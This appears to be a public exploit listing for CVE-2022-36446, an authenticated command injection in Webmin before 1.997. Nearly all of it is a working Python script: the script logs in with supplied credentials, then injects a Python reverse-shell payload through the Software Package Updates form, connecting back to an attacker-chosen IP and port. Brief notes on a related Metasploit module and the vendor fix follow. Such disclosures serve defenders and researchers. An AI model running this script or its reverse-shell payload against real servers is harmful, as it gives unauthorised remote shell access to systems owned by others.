Headline
Webmin 1.996 Remote Code Execution
Webmin version 1.996 suffers from an authenticated remote code execution vulnerability.
# Exploit Title: Webmin 1.996 - Remote Code Execution (RCE) (Authenticated)# Date: 2022-07-25# Exploit Author: Emir Polat# Technical analysis: https://medium.com/@emirpolat/cve-2022-36446-webmin-1-997-7a9225af3165# Vendor Homepage: https://www.webmin.com/# Software Link: https://www.webmin.com/download.html# Version: < 1.997# Tested On: Version 1.996 - Ubuntu 20.04.4 LTS (GNU/Linux 5.4.0-122-generic x86_64)# CVE: CVE-2022-36446import argparseimport requestsfrom bs4 import BeautifulSoupdef login(args): global session global sysUser session = requests.Session() loginUrl = f"{args.target}:10000/session_login.cgi" infoUrl = f"{args.target}:10000/sysinfo.cgi" username = args.username password = args.password data = {'user': username, 'pass': password} login = session.post(loginUrl, verify=False, data=data, cookies={'testing': '1'}) sysInfo = session.post(infoUrl, verify=False, cookies={'sid' : session.cookies['sid']}) bs = BeautifulSoup(sysInfo.text, 'html.parser') sysUser = [item["data-user"] for item in bs.find_all() if "data-user" in item.attrs] if sysUser: return True else: return Falsedef exploit(args): payload = f""" 1337;$(python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("{args.listenip}",{args.listenport})); os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'); """ updateUrl = f"{args.target}:10000/package-updates" exploitUrl = f"{args.target}:10000/package-updates/update.cgi" exploitData = {'mode' : 'new', 'search' : 'ssh', 'redir' : '', 'redirdesc' : '', 'u' : payload, 'confirm' : 'Install+Now'} if login(args): print("[+] Successfully Logged In !") print(f"[+] Session Cookie => sid={session.cookies['sid']}") print(f"[+] User Found => {sysUser[0]}") res = session.get(updateUrl) bs = BeautifulSoup(res.text, 'html.parser') updateAccess = [item["data-module"] for item in bs.find_all() if "data-module" in item.attrs] if updateAccess[0] == "package-updates": print(f"[+] User '{sysUser[0]}' has permission to access <<Software Package Updates>>") print(f"[+] Exploit starting ... ") print(f"[+] Shell will spawn to {args.listenip} via port {args.listenport}") session.headers.update({'Referer' : f'{args.target}:10000/package-updates/update.cgi?xnavigation=1'}) session.post(exploitUrl, data=exploitData) else: print(f"[-] User '{sysUser[0]}' unfortunately hasn't permission to access <<Software Package Updates>>") else: print("[-] Login Failed !")if __name__ == '__main__': parser = argparse.ArgumentParser(description="Webmin < 1.997 - Remote Code Execution (Authenticated)") parser.add_argument('-t', '--target', help='Target URL, Ex: https://webmin.localhost', required=True) parser.add_argument('-u', '--username', help='Username For Login', required=True) parser.add_argument('-p', '--password', help='Password For Login', required=True) parser.add_argument('-l', '--listenip', help='Listening address required to receive reverse shell', required=True) parser.add_argument('-lp','--listenport', help='Listening port required to receive reverse shell', required=True) parser.add_argument("-s", '--ssl', help="Use if server support SSL.", required=False) args = parser.parse_args() exploit(args)Related news
Webmin Package Updates Command Injection
This Metasploit module exploits an arbitrary command injection in Webmin versions prior to 1.997. Webmin uses the OS package manager (apt, yum, etc.) to perform package updates and installation. Due to a lack of input sanitization, it is possible to inject an arbitrary command that will be concatenated to the package manager call. This exploit requires authentication and the account must have access to the Software Package Updates module.
CVE-2022-36446: Comparing 1.996...1.997 · webmin/webmin
software/apt-lib.pl in Webmin before 1.997 lacks HTML escaping for a UI command.